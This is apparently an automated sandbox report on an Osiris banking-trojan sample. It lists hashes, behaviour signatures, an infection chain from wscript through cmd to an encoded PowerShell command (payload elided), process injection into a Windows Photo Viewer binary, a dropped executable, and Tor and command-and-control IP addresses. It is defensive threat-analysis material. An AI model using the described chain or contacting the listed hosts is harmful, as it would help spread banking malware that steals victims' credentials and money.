Malware Analysis Report

2025-01-22 13:30

Sample ID 210404-pe8qwwv14x
Target 6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.zip
SHA256 93f2dc37243ae1365ee519eaa6042aa5762e5e18fef8cb7e4bc7b657525c6895
Tags osiris banker botnet
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 93f2dc37243ae1365ee519eaa6042aa5762e5e18fef8cb7e4bc7b657525c6895

Threat Level: Known bad

The file 6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.zip was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet

Osiris

Executes dropped EXE

Looks up external IP address via web service

Uses Tor communications

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Gathers network information

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-04-04 19:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-04-04 19:45

Reported

2021-04-04 19:48

Platform

win7v20201028

Max time kernel

142s

Max time network

59s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

Signatures

Enumerates physical storage devices

Enumerates processes with tasklist

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |

Gathers network information

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |

Suspicious behavior: CmdExeWriteProcessMemorySpam

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "[encoded command elided]"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "[encoded command elided]"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\tasklist.exe

tasklist

Network

N/A

Files

memory/1700-2-0x0000000000000000-mapping.dmp

memory/1924-3-0x0000000002DA0000-0x0000000002DA4000-memory.dmp

memory/1648-4-0x0000000000000000-mapping.dmp

memory/1648-5-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

memory/1648-6-0x00000000742C0000-0x00000000749AE000-memory.dmp

memory/1648-7-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

memory/1648-8-0x0000000000F30000-0x0000000000F31000-memory.dmp

memory/1648-9-0x00000000047F0000-0x00000000047F1000-memory.dmp

memory/1648-10-0x0000000001140000-0x0000000001141000-memory.dmp

memory/1648-11-0x0000000000F32000-0x0000000000F33000-memory.dmp

memory/1648-12-0x0000000005240000-0x0000000005241000-memory.dmp

memory/1648-15-0x00000000056B0000-0x00000000056B1000-memory.dmp

memory/1648-20-0x00000000056F0000-0x00000000056F1000-memory.dmp

memory/1648-21-0x0000000005750000-0x0000000005751000-memory.dmp

memory/1648-28-0x0000000006210000-0x0000000006211000-memory.dmp

memory/1648-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/1828-30-0x0000000000000000-mapping.dmp

memory/1220-31-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-04-04 19:45

Reported

2021-04-04 19:48

Platform

win10v20201028

Max time kernel

150s

Max time network

110s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

Signatures

Osiris

banker botnet osiris

Executes dropped EXE

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | N/A |

Looks up external IP address via web service

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |

Uses Tor communications

Suspicious use of SetThreadContext

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1160 set thread context of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious use of SetWindowsHookEx

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3116 wrote to memory of 2296 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 3116 wrote to memory of 2296 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 2296 wrote to memory of 1160 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2296 wrote to memory of 1160 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2296 wrote to memory of 1160 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 1160 wrote to memory of 2300 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 2300 wrote to memory of 1624 | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe |
| PID 2300 wrote to memory of 1624 | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe |

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "[encoded command elided]"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "[encoded command elided]"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

Network

| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 131.188.40.189:80 | 131.188.40.189 | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 107.22.233.72:443 | api.ipify.org | tcp |
| N/A | 198.245.50.175:80 | 198.245.50.175 | tcp |
| N/A | 185.22.173.180:443 | | tcp |
| N/A | 8.8.8.8:53 | time-a.nist.gov | udp |
| N/A | 129.6.15.28:13 | time-a.nist.gov | tcp |
| N/A | 176.53.90.26:80 | 176.53.90.26 | tcp |
| N/A | 51.89.6.40:80 | 51.89.6.40 | tcp |
| N/A | 46.59.65.88:80 | 46.59.65.88 | tcp |
| N/A | 185.165.168.168:80 | 185.165.168.168 | tcp |
| N/A | 185.220.103.10:80 | 185.220.103.10 | tcp |
| N/A | 193.108.117.41:443 | | tcp |
| N/A | 66.175.208.248:80 | 66.175.208.248 | tcp |
| N/A | 109.68.191.132:80 | 109.68.191.132 | tcp |
| N/A | 127.0.0.1:32767 | | tcp |

Files

memory/2296-3-0x0000000000000000-mapping.dmp

memory/1160-4-0x0000000000000000-mapping.dmp

memory/1160-5-0x00000000738C0000-0x0000000073FAE000-memory.dmp

memory/1160-6-0x0000000006D70000-0x0000000006D71000-memory.dmp

memory/1160-7-0x0000000007540000-0x0000000007541000-memory.dmp

memory/1160-8-0x0000000006F00000-0x0000000006F01000-memory.dmp

memory/1160-9-0x0000000006F02000-0x0000000006F03000-memory.dmp

memory/1160-10-0x0000000007360000-0x0000000007361000-memory.dmp

memory/1160-11-0x0000000007480000-0x0000000007481000-memory.dmp

memory/1160-12-0x0000000007BE0000-0x0000000007BE1000-memory.dmp

memory/1160-13-0x0000000007E30000-0x0000000007E31000-memory.dmp

memory/1160-14-0x0000000007CA0000-0x0000000007CA1000-memory.dmp

memory/1160-15-0x0000000008780000-0x0000000008781000-memory.dmp

memory/1160-16-0x0000000008510000-0x0000000008511000-memory.dmp

memory/1160-17-0x0000000009560000-0x0000000009561000-memory.dmp

memory/1160-18-0x0000000009270000-0x0000000009271000-memory.dmp

memory/1160-19-0x00000000094F0000-0x00000000094F1000-memory.dmp

memory/1160-20-0x0000000009B00000-0x0000000009B01000-memory.dmp

memory/1160-21-0x0000000009610000-0x0000000009612000-memory.dmp

memory/1160-22-0x0000000009790000-0x00000000098DC000-memory.dmp

memory/2300-23-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2300-24-0x0000000000401698-mapping.dmp

memory/2300-26-0x00000000029A0000-0x0000000002A3F000-memory.dmp

memory/2300-25-0x0000000000400000-0x0000000000456000-memory.dmp

memory/1624-27-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

memory/1160-30-0x0000000006F03000-0x0000000006F04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 14e6bdaafdf0275caf6062ba1d9859ae
SHA1 8da08ab17eb0afdf491550d1651c9c79781b41c1
SHA256 71ee32fd26b21ab352c73cc96781d6074570cc406d5b05ae3a35957f22714a43
SHA512 439ade02e82d66bc075746c384b3a19b90320c0279b15b2f83703a6496cb337c159f209d791b1fe412600418ea027386e22fe61102aa1b4e60d691a58a032484